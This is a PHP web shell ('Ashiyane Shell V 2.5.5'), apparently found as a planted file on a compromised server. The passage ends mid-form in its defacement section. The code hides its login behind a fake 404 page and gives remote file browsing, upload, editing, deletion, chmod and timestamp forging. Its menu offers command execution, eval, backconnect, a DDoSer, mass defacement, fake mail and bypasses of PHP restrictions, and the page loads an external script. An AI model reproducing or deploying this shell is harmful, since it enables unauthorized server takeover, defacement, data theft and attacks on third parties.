관리-도구
편집 파일: c994.php
<?php /* $auth = 1; $name=''; $pass=''; if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) { header('WWW-Authenticate: Basic realm="Password Protected!!!!!!"'); header('HTTP/1.0 401 Unauthorized'); exit("<b>Powered By SHA13AH</b>"); } } */ //Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team $auth_pass = ""; @session_start(); function Login() { die("<title>404 Not Found</title><h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80</address> <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style> <pre align=center> <form method=post> <input type=password name=pass> </form></pre>"); } if(!isset($_SESSION[$_SERVER['HTTP_HOST']])) if( empty($auth_pass) || ( isset($_POST['pass']) && ($_POST['pass'] == $auth_pass) ) ) $_SESSION[$_SERVER['HTTP_HOST']] = true; else Login(); //Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team /* __ __ _ _ _ _ _ _ _ _ | \/ | __ _| |__ __| (_) | | | (_) __| | __| | ___ _ __ | |\/| |/ _ | _ \ / _` | | | |_| | |/ _` |/ _` |/ _ \ _ \ | | | | (_| | | | | (_| | |_| _ | | (_| | (_| | __/ | | | |_| |_|\__ _|_| |_|\__ _|_(_)_| |_|_|\__ _|\__ _|\___|_| |_| ASHIYANE SHELL V 2.5.5 */ ob_start(); if(!isset($_GET['action']) or $_GET['action']==""){ header("location: ?action=explorer"); } if(isset($_GET["hiddenshell"])){ exit;} if(ini_get("safe_mode")=="1"){ $safemode="<font color=red>ON</font>"; } else{ $safemode="<font color=#0F0>OFF</font>"; } if(ini_get("disable_functions")==""){ $disable_functions="<font color=#0F0>NONE</font>"; } else{ $disable_functions=ini_get("disable_functions"); } if(!function_exists('posix_getegid')) { $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $group = $gid['name']; $gid = $gid['gid']; } //Start $on="<font color=#0F0> ON </font>"; $of="<font color=red> OFF </font>"; $none="<font color=#0F0> NONE </font>"; if(function_exists('curl_version')) $curl=$on; else $curl=$of; if(function_exists('mysql_get_client_info')) $mysql=$on; else $mysql=$of; if(function_exists('mssql_connect')) $mssql=$on; else $mssql=$of; if(function_exists('pg_connect')) $pg=$on; else $pg=$of; if(function_exists('oci_connect')) $or=$on; else $or=$of; if(@ini_get('open_basedir')) $open_b=@ini_get('open_basedir'); else $open_b=$none; //End function magicboom($text){ if (!get_magic_quotes_gpc()){ return $text; } return stripslashes($text); } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function permsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>' . perms(@fileperms($f)) . '</font>'; elseif (!@is_writable($f)) return '<font color=white>' . perms(@fileperms($f)) . '</font>'; else return '<font color=#25ff00>' . perms(@fileperms($f)) . '</font>'; } function size($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } if (strtolower(substr(PHP_OS,0,3))=="win") $sys='win'; else $sys='unix'; $home_path = @getcwd(); $path = @getcwd(); if($sys == 'win') { $home_path = str_replace("\\", "/", $home_path); $path = str_replace("\\", "/", $path); } if(empty($_GET['dir'])){ $path=(dirname($_SERVER['SCRIPT_FILENAME'])); } else{ $path=(htmlspecialchars($_GET['dir'])); } if($path[strlen($path)-1] != '/' ) $path .= '/'; $cwd_links = ''; $path1 = explode("/", $GLOBALS['path']); $n=count($path1); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='?action=explorer&dir="; for($j=0; $j<=$i; $j++) $cwd_links .= $path1[$j].'/'; $cwd_links .= "'>".$path1[$i]."/</a>"; } $drives = ""; foreach(range('C','Z') as $drive) { if(is_dir($drive.':\\')){ $fso = new COM('Scripting.FileSystemObject'); $D = $fso->Drives; $Dr = $fso->GetDrive($drive); if ($Dr->IsReady ) { $drives .= '<a href="?action=explorer&dir='.$drive.":".'">[ '.$drive.' ]</a> '; } else { $drives .= '<a href="?action=explorer&dir='.$drive.":".'">[ CD-Rom : '.$drive.' ]</a> '; } } } if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!-- __ __ _ _ _ _ _ _ _ _ | \/ | __ _| |__ __| (_) | | | (_) __| | __| | ___ _ __ | |\/| |/ _ | _ \ / _` | | | |_| | |/ _` |/ _` |/ _ \ _ \ | | | | (_| | | | | (_| | |_| _ | | (_| | (_| | __/ | | | |_| |_|\__ _|_| |_|\__ _|_(_)_| |_|_|\__ _|\__ _|\___|_| |_| ASHIYANE SHELL V 2.5.5 Coded By Mahdi.Hidden --> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link href="http://ashiyane.org/aboutus/images/logo2.png" rel="icon" type="image/x-icon"/> <title>.:: <?php echo $_SERVER['HTTP_HOST']; ?> ~ Ashiyane V 2.5.5 ::.</title> <style> .header ul li{ float:left; list-style:none; margin-left:20px; } .header{ text-align:left; } .clear{ clear:both; } .top { margin-left: 100px; } .body { width: 1000px; margin: 0 auto; text-align:center; font-family: calibri; } .explorer{ text-align:left; } .top { margin-left: 100px; } .body { width: 1000px; margin: 0 auto; } .title { color: red; } body { background-color: #000; font-family: calibri; color: white; text-align: center; } hr { border: solid #454545 1px; } ul { padding: 0; margin: 0; } ul li { list-style: none; padding: 8px; margin: 2px; background: #2677B4; color: #000; font-weight: bold; cursor: pointer; } ul li:hover { background: #1D97F3; } ul a li { color: #fff; text-shadow: 0 0 5px #000; } ul li a{ color: #000; } a { color: #fff; text-decoration: none; } input { padding: 10px; } #hover tr:hover{ background-color:#646464; } #navigation{position:fixed;left:-16px;top:46%;} #totop,#tobottom{background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAACXBIWXMAAAsSAAALEgHS3X78AAAEYElEQVRYw8VXS0xcVRj+z7kv5tF5MPfOo1AgkFBKoQPuFAyxstKkcWHjGhOjcacxujMxaqtx48b4iDExxiZuXBVdtEURN00qDBMgTUOmnTEMc+/ce4d5c+k957gZEKYCd5DSb3tOzv+d//0hcACO47hgsL07HA5fDIfDkz6ffxQAogDgblypMcZypVIpYRj6DVVVZ0zTSBNCyGFvo4MOMca8LMsjvb19r8uy8iLGOAIA+JA3KaVU1XV9OpVa/VrX9QSl1G6ZgM/ni5w7N/iuooSnMMZBOAIopQVN0767e3fls1KppDoigBCCrq6ukf7+gS9cLtfTh3nJAVi9Xr+dTCbf1LTcAmNsb3ibjXd394wPDQ1fE0UxfgzGAQCQIAid0Whs8uHDrflisZjZl8Dp052jw8PxazzP9cExA2PcHgopE7Va7Y9yuZR7hIDP54uMjj71gySJF+AxAWPcHgwGh3U9f92yrOoOAYwxF4+PvB8IBF9u0e02AFAHlbEDQRA63W43zWbXf2eMMQwA0NHROaoo4VdbeYgxZmUy6SuZTPojxthmK46QZeU1WQ5d2O4x3MDA4Ader3esFePp9IMrS0tLn2iaNieKIvH7A88ghHhHWYmQWxQltL6e/ZULheTe/v7+qwjhU60YX15e/pQQ22KMEsMwbrdKwuVyxQoF82eup6fvcigUesVJ7Bljm+n0g6vbxnc1HKLrrZFACHksy1rhBgfPv9fW1jbk8OePGP/3fIeE7fcHxhyQQBijOhePj3wIAHIrbt//Xmue4HmB586eHfgYAKSj/vz/eAJjLPAA4DlonhSLpe9VVfsxGAyGd8d8Y6OgUkrJdh8JBIIRjPFOY1NV7adAINgRCATeOKC8vejSpZfs5pa8+0MAUGSM7RmnlmXlZ2d/m7AsKw8AIEmSMjHx3KwkSUpTovEA4D8gwQkPAJXGpf2mZQAh1JzBpOlXGCHUjhCSW+zOFWzbdg6eEGzbXseVSnnxSRGoVMqLWNfNm42BctIghmHcxJqWu0UpOfEwUErVfF6bwYWCmdZ1Y/qkCei6Pm0YRhoTQkgqtfoVpdR0vGMhwKIoKZIkRSRJioiipCDkfJRTSo1UavVLQgjhG2wW83nt20gk+o6TnUAQxNDY2PgMY4w2yhILghByat80jW8Mw0jubESMMVaplJORSHRcEIQzDiYZ4jjOw/O8l+d5L8dxHtTcLPbB5mb9z0Ri4a16vV7ZsxNallWtVqt/xWKxixjj0GNJe0LuLSzMTxmGfv8/t+JarapubW3Ny7Ly7HGTsG373srK8lQ2u3Zn37UcAKBYLP5tWZtzPp9vUBDEM8egDWi1Wp1bXExMZbNrdw4UJrtIqLmcel0UJdvj8Z7HGLmPVuvEWFtb+zyRWHh7Y6Nw/yjilJNlpSFO5RcwxjGH4nRd1/VfdolTciR13CTPu8Lh8POyLE96vafiPM9HAWB7kS3btp2rVMpJ0zRvqKp6yzSNjBN5/g/C3ULDeIdIrQAAAABJRU5ErkJggg==);width:32px;height:32px;opacity:0.30;margin:12px 0;} #totop:hover,#tobottom:hover{opacity:0.80;} #tobottom{-webkit-transform:scaleY(-1);-moz-transform:scaleY(-1);-o-transform:scaleY(-1);transform:scaleY(-1);filter:FlipV;-ms-filter:"FlipV";} hr{ margin-left:-10px; border-color:#2677B4; } </style> <script type='text/javascript'> var d = document; var scroll = false; function totop(){ if(!scroll){ var dur = window.pageYOffset; scroll = true; scrollto(0, dur); } } function totopd(){ d.body.scrollTop = d.documentElement.scrollTop = 0; stopscroll(); } function tobottom(){ if(!scroll){ var dur = getheight()-window.pageYOffset; scroll = true; scrollto(getheight(), dur); } } function tobottomd(){ d.body.scrollTop = d.documentElement.scrollTop = getheight(); stopscroll(); } function stopscroll(){ scroll = false; clearTimeout(timer); } function scrollto(to, dur) { var start = d.documentElement.scrollTop + d.body.scrollTop, change = to - start, cur = 0, inc = 20; var anim = function(){ if(scroll){ cur += inc; var val = easing(cur, start, change, dur); d.body.scrollTop = d.documentElement.scrollTop = val; if(cur < dur) { if(scroll) timer = setTimeout(anim, inc); } else stopscroll(); } }; anim(); } function easing(t,b,c,e){ return -c * Math.cos(t/e * (Math.PI/2)) + c + b; } function getheight(){ return Math.max( d.body.scrollHeight, d.documentElement.scrollHeight, d.body.offsetHeight, d.documentElement.offsetHeight, d.body.clientHeight, d.documentElement.clientHeight ); } </script> <SCRIPT SRC=http://www.localroot.net/ibneler/yaz.js></SCRIPT> </head> <body> <div id="navigation"> <div id="totop" onClick="totopd();" onMouseOver="totop();" onMouseOut="stopscroll();"></div> <div id="tobottom" onClick="tobottomd();" onMouseOver="tobottom();" onMouseOut="stopscroll();"></div> </div> <div style="border:4px #2677B4 solid"> <div style=" animation: 1s ease 0s normal forwards 1 alert; background-color: #2677B4; background-image: linear-gradient(135deg, transparent, transparent 25%, rgba(0, 0, 0, 0.1) 25%, rgba(0, 0, 0, 0.1) 50%, transparent 50%, transparent 75%, rgba(0, 0, 0, 0.1) 75%, rgba(0, 0, 0, 0.1)); background-size: 20px 20px; box-shadow: 0px 5px 0px rgba(0, 0, 0, 0.1); color: #F6F6F6; display: block; font: bold 16px/40px sans-serif; height: 40px; position: relative; text-align: center; text-decoration: none; width: 100%; "> Ashiyane Sheller V 2.5.5 </div> <div style="margin-left:10px;"> <div id="main"> <div class="header"> <div style="float:left;min-width:900px;max-width:900px;"><br /> <span style="">Server IP: <?php echo $_SERVER['SERVER_ADDR']; ?></span> <span style="">Your IP: <?php echo $_SERVER['REMOTE_ADDR']; ?></span><br /> <span style="">System: <?php echo php_uname(); ?></span><br /> <span style="">Software: <?php echo getenv("SERVER_SOFTWARE"); ?></span><br /> <span style="">User: <?php echo get_current_user()." "; ?></span><span>Group: <?php echo $gid ." [ $group ] ";?></span><br /> <span>PHP: <?php echo @phpversion(); ?></span><br /> <span style="">Safemode: <?php echo $safemode; ?></span><br /> <span style="">Disable_Functions: <?php echo $disable_functions; ?></span><br /> <!--<span style="">Path: <?php //echo $path; ?></span><br />--> <span>CURL:</span><?php echo $curl; ?><span>MySQL:</span><?php echo $mysql; ?><span>MsSQL:</span><?php echo $mssql; ?><span>PostgreSQL:</span><?php echo $pg?><span>Oracle:</span><?php echo $or?><br /> <span>Open_Basedir: <?php echo $open_b;?></span><BR /> <span>Domains:</span> <?php if($GLOBALS['sys']=='unix') { $d0mains = @file("/etc/named.conf"); if(!$d0mains) { echo "CANT READ named.conf"; } else { $count; foreach($d0mains as $d0main) { if(@ereg("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ flush(); $count++; } } } echo "$count Domains"; } } else{ echo"CANT READ |Windows|";} ?> <br /> <?php echo '<tr> <td height="12"><span>Path:</span></td> <td colspan="2">'.$cwd_links.' <a href="?action=explorer&dir='.$GLOBALS['home_path'].'"><font color=red >| Home Directory |</font></a></td> </tr>'; ?><br /> <span style=""><?php echo $drives; ?></span><br /> <br /> </div> <div style="float:left;margin-left:100px;"><br /><br /> <div style="font-size:20px;color:red"> <img src="http://ashiyane.org/aboutus/images/logo2.png" /> </div> </div> <div class="clear"></div><hr style="margin-left:-10px;background:#2677B4" /> <ul> <li><a href="?action=explorer&dir=<?php echo $path ?>">Explorer</a></li><li><a href="?action=terminal&dir=<?php echo $path ?>#down">Terminal</a></li><li><a href="?action=eval&dir=<?php echo $path ?>#down">Eval</a></li><li><a href="?action=basedir&dir=<?php echo $path ?>">Open Basedir</a></li><li><a href="?action=sym&dir=<?php echo $path ?>">Symlinker</a></li><li><a href="?action=cgiashiyane&dir=<?php echo $path ?>#down">CGI - Telnet</a></li><li><a href="?action=sql&dir=<?php echo $path ?>">SQL</a></li><li><a href="?action=zoneh&dir=<?php echo $path ?>">Zone-h Mass Deface Poster</a></li><li><a href="?action=ddoser&dir=<?php echo $path ?>">Ddoser</a></li><li><a href="?action=sqli&dir=<?php echo $path ?>">SQLi Target Finder</a></li><li><a href="?action=backdoor&dir=<?php echo $path ?>">Get Backdoor</a></li><li><a href="?action=mass&dir=<?php echo $path ?>">Mass Defacer</a></li><li><a href="?action=bc&dir=<?php echo $path ?>#down">BackConnect</a></li><li><a href="?action=zipper&dir=<?php echo $path ?>">Zipper</a></li><li><a href="?action=fakemail&dir=<?php echo $path ?>#down">Fake Mail</a></li><li><a href="?action=php2xml&dir=<?php echo $path ?>#down">PHP2XML</a></li><li><a href="?action=disfunc&dir=<?php echo $path ?>">Bypass Disable Functions</a></li><li><a href="?action=hashcracker&dir=<?php echo $path ?>">Hash Cracker</a></li><li><a href="?action=info&dir=<?php echo $path ?>">PHP Info</a><li><a href="?action=aboutus&dir=<?php echo $path ?>">About Us</a></li><li><a href="?action=rmshell">Remove Shell</a></li><li><a href="?action=logout">Logout</a></li></ul> <div class="clear"></div> </ul> </div> </div> <hr /> <?php if(isset($_GET['action'])){ $action=htmlspecialchars($_GET['action']); if($action=="explorer"){ ?> <br /> <div class="explorer"> <?php $files = scandir($path); ?> <table id="hover"> <th>File Name</th><th>Size</th><th>Modify</th><th>Owner/Group<th>Permission</th><th colspan=4>Actions</th> <?php $directories = array(); $files_list = array(); foreach($files as $entry){ $entry_link=$path.$entry; $entry_link= ($entry_link); if(!is_file($entry_link)){ $directories[] = $entry; } else { $files_list[] = $entry; } } ?> <?php foreach($directories as $directory){ $entry_link=$path.$directory; $entry_link= ($entry_link); if($directory!="." && $directory!=".."){ ?> <tr><td style="min-width:300px;"><?php echo "<a href=\"?action=explorer&dir=$entry_link\">| $directory |</a></td>"; ?> <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td> <td style="min-width:300px;"> <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?> </td> <td style="width:300px"> <?php $ow = @posix_getpwuid(@fileowner($entry_link)); $gr = @posix_getgrgid(@filegroup($entry_link)); echo $ow['name']?$ow['name']:@fileowner($entry_link); echo "/"; echo $gr['name']?$gr['name']:@filegroup($entry_link); ?> <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Edit Permission"><?php echo permsColor($entry_link); ?></a></td> <td><a href="?action=ff&go=rename&file=<?php echo urlencode($directory); ?>&dir=<?php echo $path ?>&f=<?php echo $directory;?>#down" title="Rename">R</a></td> <td><a href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Touch">T</a></td> <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td> </tr> <?php } } ?> </td> </tr> <?php foreach($files_list as $file_list){ $entry_link=$path.$file_list; $entry_link= ($entry_link); ?><tr><td style="min-width:300px;"><?php echo "<a href=\"?action=ff&go=view&file=$entry_link&dir=$path&f=$file_list#down\">$file_list</a></td>" ;?> <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td> <td style="min-width:300px;"> <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?> </td> <td style="width:300px"> <?php $ow = @posix_getpwuid(@fileowner($entry_link)); $gr = @posix_getgrgid(@filegroup($entry_link)); echo $ow['name']?$ow['name']:@fileowner($entry_link); echo "/"; echo $gr['name']?$gr['name']:@filegroup($entry_link); ?> <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $file_list;?>#down"><?php echo permsColor($entry_link); ?></a></td> <td><a title="Rename" href="?action=ff&go=rename&file=<?php echo urlencode($file_list); ?>&dir=<?php echo $path ?>&f=<?php echo $file_list;?>#down">R</a></td> <td><a title="Touch" href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $file_list;?>#down">T</a></td> <td><a title="Edit" href="?action=ff&go=edit&file=<?php echo $entry_link ?>&dir=<?php echo $path ?>&f=<?php echo $file_list;?>#down">E</a></td> <td><a title="Download" href="?action=ff&dir=<?php echo $path?>&go=download&file=<?php echo $entry_link; ?>">D</a></td> <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td> </tr> <?php } ?> </table> <Br /><Br /> <hr /> <a name="down"></a> <table style="float:left"> <tr> <?php if(!is_writable($GLOBALS['path'])) { echo " <style> .dir { background-color:red; } </style> "; } ?> <form action="" enctype="multipart/form-data" method="POST"> <td><span>Select File: </span><input type="file" name="userfile" /><input type="hidden" name="path" value="<?php echo $path ?>" /><input type="hidden" value="upload" name="type" /></td><td><input type="submit" value=">>" /> </form> </td> </tr><tr> <form action="" enctype="multipart/form-data" method="POST"> <td><span>Make Folder: </span><input type="hidden" value="makefolder" name="type" /><input type="text" class="dir" name="namefolder" /></td><td><input type="submit" value=">>" /> </form> </td></tr><tr> <form action="" enctype="multipart/form-data" method="POST"> <td><span>Make File: </span><input type="hidden" value="makefile" name="type" /><input type="text" class="dir" name="namefile" /></td><td><input type="submit" value=">>" /> </form> </td></tr></table> <table style="float:left;margin-left:20px"> <tr> <form action="?action=terminal&CMD=shell#down" method="post"> <td><span>CMD > </span> <input onMouseOver="this.focus();" id="cmd" class="input dir" type="text" name="cmd" style="width:60%;" value="" /></td><td> <input class="inputbutn" type="submit" value=">>" name="submitcmd" /></td> </form> </tr> <tr> <td> <form action="" method="get"> <span>Change Dir: </span> <input type="hidden" name="action" value="explorer" /> <input type="text" class="dir" name="dir" value="<?php echo $path;?>" /> </td><td><input type="submit" value=">>" /></td> </form> </table><div style="clear:both"></div> <?php if(isset($_POST['type']) && $_POST['type']=="upload"){ if(isset($_FILES['userfile'])){ $upload_dir=$_POST['path']; $upload_file=$upload_dir."/".basename($_FILES['userfile']['name']); if(move_uploaded_file($_FILES['userfile']['tmp_name'],$upload_file)){ echo "ok"; header("location: ?action=explorer&dir=$path"); } } } if(isset($_POST['type']) && $_POST['type']=="makefolder"){ if(isset($_POST['namefolder']) && $_POST['namefolder']!=""){ $foldername=$path.$_POST['namefolder']; if(mkdir($foldername)){ echo "ok"; header("location: ?action=explorer&dir=$path"); } else { echo "can't be make folder"; } } else{ echo "enter folder name"; } } if(isset($_POST['type']) && $_POST['type']=="makefile"){ if(isset($_POST['namefile']) && $_POST['namefile']!=""){ $fn=$_POST['namefile']; $filename=$path.$_POST['namefile']; if(!file_exists($filename)){ if(touch($filename)){ $fp = fopen($filename, "w"); if ($fp) { fclose($fp); header("location: ?action=ff&go=edit&file=$filename&dir=$path&f=$fn#down"); } } echo "ok"; } else { echo "can't be make file"; } } else{ echo "enter file name"; } } ?> </div> <?php } if($action=="ff"){ if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="download" && $_GET['file']!='' ){ ob_end_clean(); $_GET['file'] = urldecode($_GET['file']); if(is_file($_GET['file']) && is_readable($_GET['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_GET['file'])); if (function_exists("mime_content_type")) { $type = mime_content_type($_GET['file']); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } $fp = fopen($_GET['file'], "r"); if($fp) { while(!feof($fp)) echo fread($fp, 1024); fclose($fp); } }exit; } ob_start(); function info(){ global $path; echo "<style>.info li{list-style:none;float:left;color: #fff;text-shadow: 0px 0px 5px #000;}</style>"; echo "<ul class=\"info\">"; $f2 = urlencode($_GET['f']); $file2 = $_GET['file']; echo "<a href=\"?action=ff&go=rename&file=$file2&dir=$path&f=$f2#down\"><li>Name: ".htmlspecialchars($_GET['f'])."</li></a>"; if(!is_dir($file2)){ echo "<a href=\"?action=ff&go=view&file=$file2&dir=$path&f=$f2#down\"><li>View: ".htmlspecialchars($_GET['f'])."</li></a>"; echo "<a href=\"?action=ff&go=edit&file=$file2&dir=$path&f=$f2#down\"><li>Edit: ".htmlspecialchars($_GET['f'])."</li></a>"; } echo "<a href=\"?action=ff&go=touch&file=$file2&dir=$path&f=$f2#down\"><li>Tuoch: ".@date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $file2))."</li></a>"; echo "<li>Size: ".(is_file($_GET['file'])?size(filesize($_GET['file'])):'-')."</li>"; echo "<a href=\"?action=ff&go=perm&file=$file2&dir=$path&f=$f2#down\"><li>Permissions: ".permsColor($_GET['file'])."</li></a>"; $ow = @posix_getpwuid(@fileowner($_GET['file'])); $gr = @posix_getgrgid(@filegroup($_GET['file'])); echo "<li>Owner/Group: "; echo $ow['name']?$ow['name']:@fileowner($_GET['file']); echo "/"; echo $gr['name']?$gr['name']:@filegroup($_GET['file']); echo "</li>"; echo "</ul>"; echo "<div class=\"clear\"></div>"; } //Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team ?> <div style="text-align:left"> <?php info(); ?> <?php if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="rename" ){ $f3 = $_GET['f']; $f4 = $_GET['file']; if(isset($_POST['name'])){ $nname=$_GET['dir'].$_POST['name']; $nn=$_POST['name']; $oname=$_GET['dir'].$_POST['file']; if(@rename($oname,$nname)){ header("location: ?action=ff&go=rename&dir=$path&file=$nname&f=$nn"); } else { echo "can't rename"; } } ?> <a name="down"></a><br><span>Rename File:</span><form action="?action=ff&go=rename&dir=<?php echo $path?>&file=<?php echo $_GET['file'];?>&f=<?php echo $_GET['f'];?>#down" method="post"><input type=text name=name value="<?php echo $_GET['f'];?>"><input type="hidden" name="file" value="<?php echo $_GET['f'];?>"><input type=submit value=">>"></form> <?php } if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="view" && $_GET['file']!="" ){ echo '<a name="down"></a><span>View File:</span><pre style="border:1px solid #0E304A;padding:5px;margin:0;overflow: auto;">'; $fp = @fopen($_GET['file'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; } if(isset($_GET['go']) && isset($_GET['f']) && $_GET['go']=="delete" && $_GET['f']!="" ){ function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_dir(@$_GET['f'])){ deleteDir(@$_GET['f']); header("location: ?action=explorer&dir=$path"); } else { @unlink(@$_GET['f']); header("location: ?action=explorer&dir=$path"); } } if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="touch" && $_GET['file']!="" ){ ?> <a name=\"down\"></a><hr><br><span>Touch: </span> <form action="?action=ff&go=ttouch&dir=<?php echo $path ?>&file=<?php echo $_GET['file'];?>&f=<?php echo $_GET['f'];?>#down" method="post"> <input type="hidden" name="f" value="<?php echo $_GET['file'];?>" /><input type="text" name="ttouch" value="<?php echo date("Y-m-d H:i:s", @filemtime($_GET['file'])); ?>" /><input type="submit" value=">>" /> </form> <?php } if(isset($_GET['go']) && isset($_POST['ttouch']) && $_GET['go']=="ttouch" && $_POST['ttouch']!="" ){ echo "<a name=\"down\"></a><hr><br>"; $f=$_POST['f']; $f2=$_GET['f']; $time = strtotime($_POST['ttouch']); if($time) { if(!touch($_POST['f'],$time,$time)) echo 'Fail!'; else echo 'Touched!';header("location: ?action=ff&go=touch&dir=$path&file=$f&f=$f2"); } } if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="perm" && $_GET['file']!="" ){ ?> <a name=\"down\"></a><br><span>Change Modify: </span> <form action="?action=ff&go=chmod&file=<?php echo $_GET['file'];?>&f=<?php echo $_GET['f']; ?>&dir=<?php echo $path ?>" method="post"> <input type="hidden" name="f" value="<?php echo $_GET['file'];?>" /><input type="hidden" name="f2" value="<?php echo $_GET['f'];?>" /><input type="text" name="perm" value="<?php echo substr(sprintf('%o', fileperms($_GET['file'])),-4);?>" /><input type="submit" value=">>" /> </form> <?php } if(isset($_GET['go']) && isset($_POST['f']) && $_GET['go']=="chmod" && $_POST['f']!="" ){ $f=$_POST['f']; $f2=$_POST['f2']; if(!empty($_POST['perm']) ) { $perms = 0; for($i=strlen($_POST['perm'])-1;$i>=0;--$i) $perms += (int)$_POST['perm'][$i]*pow(8, (strlen($_POST['perm'])-$i-1)); if(!@chmod($f, $perms)) echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font>'; } echo '<font color="#FFFFFF"><b>OK !</b></font>'; header("location: ?action=ff&go=perm&dir=$path&file=$f&f=$f2"); } if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="edit" && $_GET['file']!="" ){ echo "<a name=\"down\"></a>"; $f=$_GET['file']; if( !is_writable($_GET['file'])) { echo 'File isn\'t writeable'; exit; } if(!empty($_POST['etext']) ) { $time = @filemtime($_GET['file']); $_POST['text'] = substr($_POST['text'],0); $fp = @fopen($_GET['file'],"w"); if($fp) { @fwrite($fp,$_POST['text']); @fclose($fp); echo 'Saved!'; @touch($_GET['file'],$time,$time); } } $ff=$_GET['file']; $fff=$_GET['f']; echo "<br><span>Edit File: </span><form action=\"?action=ff&go=edit&file=$f&dir=$path&file=$ff&f=$fff#down\" method=\"post\"><textarea name=\"text\" style=\"width:800px;height:400px\">"; $fp = @fopen($_GET['file'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>" name="etext"></form>'; } ?> </div> <?php } if($action=="zoneh"){ ?><br /> <div class="zoneh"> <form action="?action=zoneh&submit=send&dir=<?php echo $path ?>" method="post"> <span>Notifier: </span><input name="defacer" size="67" id="text" value="Ashiyane Digital Security Team" type="text"><br /> <span>Select Hack Method: </span><select name="hackmode"> <option value="">--------SELECT--------</option> <option value="1" >known vulnerability (i.e. unpatched system)</option> <option value="2" >undisclosed (new) vulnerability</option> <option value="3" >configuration / admin. mistake</option> <option value="4" >brute force attack</option> <option value="5" >social engineering</option> <option value="6" >Web Server intrusion</option> <option value="7" >Web Server external module intrusion</option> <option value="8" >Mail Server 